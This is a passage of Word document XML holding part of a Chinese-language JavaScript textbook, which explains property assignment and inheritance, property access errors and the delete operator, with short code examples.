      <w:r>
        <w:t>定义一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var q=inherit(p);//q</w:t>
      </w:r>
      <w:r>
        <w:t>继承</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>q.z=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=q.t</w:t>
      </w:r>
      <w:r>
        <w:t>oString();//toString</w:t>
      </w:r>
      <w:r>
        <w:t>继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>q.x+q.y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>分别继承自</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现在假设给对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>赋值，如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中已经有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>（这个属性不是继承来的），那么这个赋值操作只改变这个已有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中不存在属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，那么赋值操作给</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>添加一个新属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>。如果之前</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>继承自属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，那么这个继承的属性就被新创建的同名属性覆盖了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性赋值操作首先检查原型链，以此判定是否允许赋值操作。例如，如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>继承自一个只读属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，那么赋值操作是不允许的（</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节将对此进行</w:t>
      </w:r>
      <w:r>
        <w:t>详细讨论）。如果允许属性赋值操作，它也总是在原始对象上创建属性或对已有的属性赋值，而不会去修改原型链。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，只有在查询属性时才会体会到继承的存在，而设</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>置属性则和继承无关，这是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一个重要特性，该特性让程序员可以有选择地覆盖（</w:t>
      </w:r>
      <w:r>
        <w:t>override</w:t>
      </w:r>
      <w:r>
        <w:t>）继承的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var unitcircle={r:1};//</w:t>
      </w:r>
      <w:r>
        <w:t>一个用来继承的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var c=inherit(unitcircle);//c</w:t>
      </w:r>
      <w:r>
        <w:t>继承属性</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.x=1;c.y=1;//c</w:t>
      </w:r>
      <w:r>
        <w:t>定义两个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.r=2;//c</w:t>
      </w:r>
      <w:r>
        <w:t>覆盖继承来的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>unitcircle.r;//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，原型对象没有修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性赋值要么失败，要么创建一个属性，要么在原始对象中设置属性，但有一个例外，如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>继承自属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，而这个属性是一个具有</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法的</w:t>
      </w:r>
      <w:r>
        <w:t>accessor</w:t>
      </w:r>
      <w:r>
        <w:t>属性（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节），那么这时将调用</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法而不是给</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>。需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法是由对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>调用的，而不是定义这个属性的原型对象调用的。因此如果</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法定义任意属性，这个操作只是针对</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>本身，并不会修改原型链。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="6_2_3_Shu_Xing_Fang_Wen_Cuo_Wu_"/>
      <w:r>
        <w:t>6.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　属性访问错误</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性访问并不总是返回或设置一个值。</w:t>
      </w:r>
      <w:r>
        <w:t>本节讲述查询或设置属性时的一些出错情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询一个不存在的属性并不会报错，如果在对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>自身的属性或继承的属性中均未找到属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，属性访问表达式</w:t>
      </w:r>
      <w:r>
        <w:t>o.x</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。回想一下我们的</w:t>
      </w:r>
      <w:r>
        <w:t>book</w:t>
      </w:r>
      <w:r>
        <w:t>对象有属性</w:t>
      </w:r>
      <w:r>
        <w:t>"sub-title"</w:t>
      </w:r>
      <w:r>
        <w:t>，而没有属性</w:t>
      </w:r>
      <w:r>
        <w:t>"subtitle"</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>book.subtitle;//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>undefined:</w:t>
      </w:r>
      <w:r>
        <w:t>属性不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是，如果对象不存在，那么试图查询这个不存在的对象的属性就会报错。</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值都没有属性，因此查询这些值的属性会报错，接上例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>抛出一个类型错误异常，</w:t>
      </w:r>
      <w:r>
        <w:t>und</w:t>
      </w:r>
      <w:r>
        <w:t>efined</w:t>
      </w:r>
      <w:r>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var len=book.subtitle.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除非确定</w:t>
      </w:r>
      <w:r>
        <w:t>book</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>book.subtitle</w:t>
      </w:r>
      <w:r>
        <w:t>都是（或在行为上）对象，否则不能这样写表达式</w:t>
      </w:r>
      <w:r>
        <w:t>book.subtitle.length</w:t>
      </w:r>
      <w:r>
        <w:t>，因为这样会报错，下面提供了两种避免出错的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一种冗余但很易懂的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var len=undefined;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(book){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(book.subtitle)len=book.subtitle.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一种更简练的常用方法，获取</w:t>
      </w:r>
      <w:r>
        <w:t>subtitle</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var len=book</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>book.subtitle</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>book.subtitle.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了理解为什么这里的第二种方法可以避免类型错误异常，可以参照</w:t>
      </w:r>
      <w:r>
        <w:t>4.10.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中关于＆＆运算符的短路行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当然，给</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>设置属性也会报类型错误。给其他值设置属性也不总是成功，有一些属性是只读的，不能重新赋值，有一些对象不允许新增属性，但让人颇感意外的是，这些设置属性的失败操作不会报错：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>内置构造函数的原型是只读的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>赋值失败，但没报错，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>没有修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是一个历史遗留问题，这个</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的严格模式中已经修复。在严格模式中，任何失败的属性设置操作都会抛出一个类型错误异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管属性赋值成功或失败的规律看起来很简单，但要描述清楚并不容易。在这些场景下给对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>设置属性</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>会失败：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·o</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>是只读的：不能给只读属性重新赋值（</w:t>
      </w:r>
      <w:r>
        <w:t>defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中有一个例外，可以对可配置的只读属性重新赋值）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·o</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>是继承属性</w:t>
      </w:r>
      <w:r>
        <w:t>，且它是只读的：不能通过同名自有属性覆盖只读的继承属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·o</w:t>
      </w:r>
      <w:r>
        <w:t>中不存在自有属性</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法继承属性</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>，并且</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的可扩展性（</w:t>
      </w:r>
      <w:r>
        <w:t>extensible attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中不存在</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>，而且没有</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法可供调用，则</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>一定会添加至</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中。但如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>不是可扩展的，那么在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中不能定义新属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="6_3_Shan_Chu_Shu_Xing_"/>
      <w:r>
        <w:t>6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　删除属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.13.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）可以删除对象的属性。它的操作数应当是一个属性访问表达式。让人感到意外的是，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>只是断开属性和宿主对象的联系，而</w:t>
      </w:r>
      <w:r>
        <w:t>不会去操作属性中的属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete book.author;//book</w:t>
      </w:r>
      <w:r>
        <w:t>不再有属性</w:t>
      </w:r>
      <w:r>
        <w:t>author</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete book["main title"];//book</w:t>
      </w:r>
      <w:r>
        <w:t>也不再有属性</w:t>
      </w:r>
      <w:r>
        <w:t>"main title"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符只能删除自有属性，不能删除继承属性（要删除继承属性必须从定义这个属性的原型对象上删除它，而且这会影响到所有继承自这个原型的对象）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>表达式删除成功或没有任何副作用（比如删除不存在的属性）时，它返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>后不是一个属性访问表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>同样返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o={x:1};//o</w:t>
      </w:r>
      <w:r>
        <w:t>有一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，并继承属性</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>什么都没做（</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>已经不存在了），返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
